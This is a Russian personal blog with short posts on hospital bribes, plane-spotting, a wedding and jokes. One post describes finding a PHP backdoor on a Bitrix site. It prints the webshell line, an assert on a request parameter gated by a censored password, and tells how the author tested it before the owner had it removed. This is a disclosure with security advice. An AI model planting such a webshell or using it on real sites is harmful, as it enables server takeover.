Очень тёмный бложек

18+


Камбэк, типа
Vonni
inghost
Приветики. В жэжэшечках по прежнему скучно и уныло. А я после небольшого и малоприятного перерыва, пожалуй, что-нибудь попишу тут у вас.

Про врачей
Babulya
inghost
Из разговора с супругой:
- Врач какая-то недовольная, даже ничего не спрашивала, сказала завтра выписываю и всё. Она может думала, что денег ей дадим?
- Не знаю, возможно. Может не выспалась?
- Вряд ли. Тут, оказывается, почти все ей платили, чтобы лежать у неё, причём не мало. Поэтому наверное все зайчики и котики :)
- Интересно! И сколько платили?
- 3000-5000 рублей.
---
Условно возьмем одну палату, зафиксированную за конкретным врачом. 6 человек, которые в среднем лежат 1 неделю каждый. 4 человека (не все платят) х 4 недели х 3000 рублей (по минимуму) = 48000 рублей.
Палат в отделении 16. А врачей явно меньше, раза в 3-4.
Также, для особо избранных в отделении есть палаты по 2 человека, с телевизором и, видимо, прочими удобствами.
Что-что говорите? Коррупции в медицине нет? Зарплаты низкие?
Интересная картина складывается: вчера утром прооперировали. По некоторым причинам потеряли много крови, причем так, что и сегодня ходить тяжело, так как кружится голова. Я не врач, и могу ошибаться, но что-то мне подсказывает, что выписка уже завтра - слишком быстро для достаточного восстановления. Или нормально? Или так как не заплатили - валите по домам и хрен бы с вами?

Немного о бэкдорах
Babulya
inghost
Почувствовал вчера себя кул-хацкером. А именно, на сайте одного из культурных заведений города (под управлением CMS 1C-Битрикс) наткнулся на ошибку, которую выдавала система.
Ошибка представляла собой строку, завернутую в base64.

Быстренько декодировав строчку обнаружил фрагмент PHP кода и в том числе ту его часть, которую и предполагал увидеть:
if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "<вырезано цензурой>") { @assert($_REQUEST["c"]); }

Перевожу: если в запросе есть строка (вырезано цензурой), то выполнить на сервере содержимое этого запроса. Остальная часть скрипта передавала URL зараженной страницы на левый сервер злоумышленникам.

Проверка работоспособности скрипта удалась - через полминуты загрузил на сервер сторонний php-файл (который, впрочем, невинно выводил Hello, World) и исполнил его. Злоумышленник же может залить php-файл иного разбора и поиметь весь сайт, включая файлы и базы данных.
Хорошо, что управляющий данным заведением - хороший знакомый, через пару минут он был в курсе о зияющем backdoor, и в течение часа разработчик сайта уже активно вычищал вредоносный php-код.

Бэкдор, кстати, схематично похож на тот, который буквально недавно рассылался якобы от имени Роскомнадзора, но чуть другой.

Мораль: будьте бдительны. Всегда используйте последние версии CMS, следите за вашим хостингом и обновлениями безопасности, и чаще меняйте пароли. И не заказывайте сайты у нерадивых разработчиков с большой текучкой кадров :)
Хотя, как показал опыт, можно сильно усомниться в качестве кода и "великих" (раскрученных на всю Россию) студий :) :) :)

А мы с супругой посетим различные культурные мероприятия в знак благодарности от заведения. Всем добра :)

Из интернетов
Babulya
inghost
Ржу :)

Свадебный споттинг ;)
Babulya
inghost
И чтобы два раза не вставать, пока до ЖЖ добрался.

Как известно, чуть больше недели назад ваш покорный слуга имел счастье жениться. Свадьбу не гуляли, но на торжественный споттинг в предыдущий четверг выбрались ;)

Да и по крайне редкому совпадению планирование на этот день назначило командиром ВС моего хорошего товарища, Ваню К., так что просто грех было не выбраться в этот день в аэропорт.

В ролях:
Супруг - супруг.
Супруга - супруга.
Свадебный споттер - West.Zoom.
Большой такой зеленый самолет - Airbus A319.
Авиакомпания - S7.


Занесло тут к нам футболистов на досуге
Babulya
inghost
... на газпромовском Sukhoi SuperJet 100. А точнее - Локомотив (Москва) собрался в Армавир, поиграть с местным Торпедо. Но от футбола я далек, а вот самолеты - наше всё.

Насколько я фанат Airbus, но Суперджет очень даже люблю и уважаю: машина красивая и грациозная.





Еще несколько снимковCollapse )

1 day left
Babulya
inghost
Отжали паспорта, да

Полет ради полета!
Babulya
inghost
Авиасалон МАКС - это хорошо. А просто полёт, неважно куда - еще лучше.

Вот и вчера: pushback, запуск, спокойное руление по перрону Домодедово, выруливание на исполнительный... тот момент, когда вокруг наступает тишина и сердце практически замирает в ожидании этого звука... стабилизация... и через пару секунд двигатели уже ревут во всю свою мощь, пропуская через себя тысячи кубометров воздуха и увлекая за собой как пушинку 60 с лишним тонн. Тебя вжимает в спинку кресла, теперь уже сердце работает в такт двигателям, выбрасывая в кровь кучу адреналина. 30 секунд, отрыв, и земля через мгновения становится где-то далеко внизу.



Потом... Потом небольшое ковыряние в облаках, и под крыльями Airbus A319 наступает безмятежность.



еще фото и видеоCollapse )

Аааааееее
Babulya
inghost
- Хочу сока.
- Ну сейчас пойдем, возьмем.
- Я ж не выпью литр сока
- Ну возьмем 0,5.
- Нееееет, литровый вкуснее

36 days left
Babulya
inghost
И да, камрады как всегда радуют, гг

?

Log in